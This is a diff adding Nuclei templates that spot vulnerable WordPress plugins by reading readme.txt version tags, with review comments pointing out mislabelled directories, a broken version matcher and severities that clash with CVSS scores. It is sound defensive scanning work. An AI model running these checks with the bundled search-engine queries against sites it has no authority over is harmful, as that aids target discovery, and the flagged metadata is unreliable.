@@ -0,0 +1,59 @@ +id: support-chat-18aa420081599222efb2bc477402197c + +info: + name: > + Click to Chat – WP Support All-in-One Floating Widget <= 2.3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via wpsaio_snapchat Shortcode + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4c13600-0791-4ade-9c28-f43f164aedae?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/support-chat/" + google-query: inurl:"/wp-content/plugins/support-chat/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,support-chat,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/support-chat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "support-chat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/other/talkback-secure-linkback-protocol.yaml b/poc/other/talkback-secure-linkback-protocol.yaml new file mode 100644 index 0000000000..5fa86f54b5 --- /dev/null +++ b/poc/other/talkback-secure-linkback-protocol.yaml 
@@ -0,0 +1,59 @@ +id: talkback-secure-linkback-protocol + +info: + name: > + Talkback <= 1.0 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/94fdc98a-c8be-47b4-a0a2-02d7373ab85e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/talkback-secure-linkback-protocol/" + google-query: inurl:"/wp-content/plugins/talkback-secure-linkback-protocol/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,talkback-secure-linkback-protocol,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/talkback-secure-linkback-protocol/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "talkback-secure-linkback-protocol" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml b/poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml new file mode 100644 index 0000000000..870fbefba6 --- /dev/null +++ b/poc/other/woo-edit-templates-52ac4a41ac945104628da0254866ee1d.yaml 
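Review bot: `severity: critical` is assigned here on the strength of a single GET of `readme.txt` and a `compare_versions(version, '<= 1.0')` check on its `Stable tag`; nothing in the template touches the affected code path, so a hit is a version indicator rather than a confirmed finding. The description is empty, so I would state that there, e.g. `Version-based detection from readme.txt only; confirm the installed plugin version before triage.` Note also that `([0-9.]+)` cannot capture a readme that declares `Stable tag: trunk`, so such installs produce no result at all. The telecash-ricaricaweb hunk later in this diff has the same shape and the same severity.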
@@ -0,0 +1,59 @@ +id: woo-edit-templates-52ac4a41ac945104628da0254866ee1d + +info: + name: > + Edit WooCommerce Templates <= 1.1.2 - Reflected Cross-Site Scripting via page + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3704b365-cbdf-4c74-9619-59f0a10e3c6a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-edit-templates/" + google-query: inurl:"/wp-content/plugins/woo-edit-templates/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-edit-templates,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-edit-templates/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-edit-templates" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.2') \ No newline at end of file diff --git a/poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml b/poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml new file mode 100644 index 0000000000..9a61c5cbe3 --- /dev/null +++ b/poc/other/woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a.yaml 
@@ -0,0 +1,59 @@ +id: woo-shipping-dpd-baltic-5681113187062e697437a90c1e0dfe1a + +info: + name: > + DPD Baltic Shipping <= 1.2.83 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6251d0f6-b536-4122-8fdf-bb77665a4f41?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-shipping-dpd-baltic/" + google-query: inurl:"/wp-content/plugins/woo-shipping-dpd-baltic/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-shipping-dpd-baltic,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-shipping-dpd-baltic/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-shipping-dpd-baltic" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.83') \ No newline at end of file diff --git a/poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml b/poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml new file mode 100644 index 0000000000..f00468ecf9 --- /dev/null +++ b/poc/remote_code_execution/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml 
@@ -0,0 +1,59 @@ +id: woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef + +info: + name: > + Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-parcel-pro/" + google-query: inurl:"/wp-content/plugins/woo-parcel-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-parcel-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-parcel-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-parcel-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.4') \ No newline at end of file diff --git a/poc/search/acf-images-search-and-insert.yaml b/poc/search/acf-images-search-and-insert.yaml new file mode 100644 index 0000000000..152860a2bc --- /dev/null +++ b/poc/search/acf-images-search-and-insert.yaml 
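Review bot: This template is added under `poc/remote_code_execution/` although its own `name` reads `Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting`, and the identical blob (`index 0000000000..f00468ecf9`) is added a second time under `poc/sql/` later in this diff. Anyone selecting templates by directory gets an XSS version check reported in an RCE or SQL run, and loading both directories presumably evaluates the same check twice. I would keep a single copy in a directory that matches the vulnerability class. The three CVE templates added under `poc/sql/` (CVE-2024-10014, CVE-2024-8740, CVE-2024-9382) are likewise cross-site scripting entries by their names.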
@@ -0,0 +1,59 @@ +id: acf-images-search-and-insert + +info: + name: > + ACF Images Search And Insert <= 1.1.4 - Authenticated (Subscriber+) Arbitrary File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/107a0612-5e58-428b-a097-1c4012e89449?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/acf-images-search-and-insert/" + google-query: inurl:"/wp-content/plugins/acf-images-search-and-insert/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,acf-images-search-and-insert,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-images-search-and-insert/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-images-search-and-insert" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml b/poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml new file mode 100644 index 0000000000..9946a6f80b --- /dev/null +++ b/poc/social/social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3.yaml 
@@ -0,0 +1,59 @@ +id: social-share-with-floating-bar-ccbc333547a329aca2de86d7452504a3 + +info: + name: > + Social Share With Floating Bar <= 1.0.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ec35484-8561-4a8c-bf67-0a880f915fb1?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/social-share-with-floating-bar/" + google-query: inurl:"/wp-content/plugins/social-share-with-floating-bar/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,social-share-with-floating-bar,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/social-share-with-floating-bar/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "social-share-with-floating-bar" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml b/poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml new file mode 100644 index 0000000000..ba06bdbb7f --- /dev/null +++ b/poc/sql/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a + +info: + name: > + Flat UI Button <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via flatbtn Shortcode + author: topscoder + severity: low + description: > + The Flat UI Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's flatbtn shortcode in version 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ec5474ac-62d7-4431-b789-51c831dd1c20?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10014 + metadata: + fofa-query: "wp-content/plugins/flat-ui-button/" + google-query: inurl:"/wp-content/plugins/flat-ui-button/" + shodan-query: 'vuln:CVE-2024-10014' + tags: cve,wordpress,wp-plugin,flat-ui-button,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/flat-ui-button/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "flat-ui-button" + part: body + + - type: dsl + dsl: + - compare_versions(version, '1.0') \ No newline at end of file diff --git a/poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml b/poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml new file mode 100644 index 0000000000..5cf235f977 --- /dev/null 
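Review bot: The DSL matcher `compare_versions(version, '1.0')` carries no comparison operator, unlike every other template in this diff and unlike the `<= 1.0` in this template's own `name`. A bare constraint presumably matches only an exact 1.0, so an install reporting an earlier `Stable tag` would be missed; if the title is right, the line should read `- compare_versions(version, '<= 1.0')`. Separately, `severity: low` and the `low` tag disagree with `cvss-score: 6.4`, which falls in the CVSS v3.1 medium band, so I would set `severity: medium` and adjust the tag to match.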
+++ b/poc/sql/CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8740-b2d2025fc8d62dbeaa509a90233bcea6 + +info: + name: > + GetResponse Forms by Optin Cat <= 2.5.6 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The GetResponse Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51d14f45-4c30-4225-998d-f4f829e09bc0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8740 + metadata: + fofa-query: "wp-content/plugins/getresponse/" + google-query: inurl:"/wp-content/plugins/getresponse/" + shodan-query: 'vuln:CVE-2024-8740' + tags: cve,wordpress,wp-plugin,getresponse,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/getresponse/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "getresponse" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.6') \ No newline at end of file diff --git a/poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml b/poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml new file mode 100644 index 0000000000..e9f932e670 --- /dev/null 
+++ b/poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d + +info: + name: > + Gantry 4 Framework <= 4.1.21 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Gantry 4 Framework plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'override_id' parameter in all versions up to, and including, 4.1.21 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d539a066-6b59-4235-868e-f3085436e9f4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9382 + metadata: + fofa-query: "wp-content/plugins/gantry/" + google-query: inurl:"/wp-content/plugins/gantry/" + shodan-query: 'vuln:CVE-2024-9382' + tags: cve,wordpress,wp-plugin,gantry,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gantry/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gantry" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.21') \ No newline at end of file diff --git a/poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml b/poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml new file mode 100644 index 0000000000..f00468ecf9 --- /dev/null 
+++ b/poc/sql/woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef.yaml @@ -0,0 +1,59 @@ +id: woo-parcel-pro-c9425826952d0dbfb82156a3b44360ef + +info: + name: > + Parcel Pro <= 1.8.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e8fe6f4-7e41-44d3-9980-b5e7f43aa849?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-parcel-pro/" + google-query: inurl:"/wp-content/plugins/woo-parcel-pro/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-parcel-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-parcel-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-parcel-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.4') \ No newline at end of file diff --git a/poc/web/telecash-ricaricaweb.yaml b/poc/web/telecash-ricaricaweb.yaml new file mode 100644 index 0000000000..53b2f86628 --- /dev/null +++ b/poc/web/telecash-ricaricaweb.yaml 
@@ -0,0 +1,59 @@ +id: telecash-ricaricaweb + +info: + name: > + Telecash Ricaricaweb <= 2.2 - Unauthenticated PHP Object Injection + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fa6998-b85a-413e-be00-81926b4ea6ab?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/telecash-ricaricaweb/" + google-query: inurl:"/wp-content/plugins/telecash-ricaricaweb/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,telecash-ricaricaweb,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/telecash-ricaricaweb/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "telecash-ricaricaweb" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2') \ No newline at end of file diff --git a/poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml b/poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml new file mode 100644 index 0000000000..34b309e326 --- /dev/null +++ b/poc/wordpress/easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5.yaml 
@@ -0,0 +1,59 @@ +id: easy-menu-manager-wpzest-e32e297ce86e8dc8002e1c7e5ef3e5a5 + +info: + name: > + Easy Menu Manager | WPZest <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f60df43a-eef3-449d-96fd-b26e28361f81?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/easy-menu-manager-wpzest/" + google-query: inurl:"/wp-content/plugins/easy-menu-manager-wpzest/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,easy-menu-manager-wpzest,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/easy-menu-manager-wpzest/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "easy-menu-manager-wpzest" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml b/poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml new file mode 100644 index 0000000000..168df00922 --- /dev/null +++ b/poc/wordpress/mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0.yaml 
@@ -0,0 +1,59 @@ +id: mas-wp-job-manager-company-91a354031afaf753cd10201b4ae5dcc0 + +info: + name: > + MAS Companies For WP Job Manager <= 1.0.13 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc277e7c-86ec-448f-a91e-e4d12a4b4177?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/mas-wp-job-manager-company/" + google-query: inurl:"/wp-content/plugins/mas-wp-job-manager-company/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,mas-wp-job-manager-company,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/mas-wp-job-manager-company/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "mas-wp-job-manager-company" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.13') \ No newline at end of file diff --git a/poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml b/poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml new file mode 100644 index 0000000000..224807c50a --- /dev/null +++ b/poc/wordpress/wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d.yaml 
@@ -0,0 +1,59 @@ +id: wp-sendgrid-mailer-1e450f9dcaa4b5d309da402a93b6466d + +info: + name: > + SendGrid for WordPress <= 1.4 - Missing Authorization to Authenticated (Subscriber+) Log Deletion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/bb7d99a7-1e7d-43e1-839c-286b454c8276?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-sendgrid-mailer/" + google-query: inurl:"/wp-content/plugins/wp-sendgrid-mailer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-sendgrid-mailer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-sendgrid-mailer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-sendgrid-mailer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file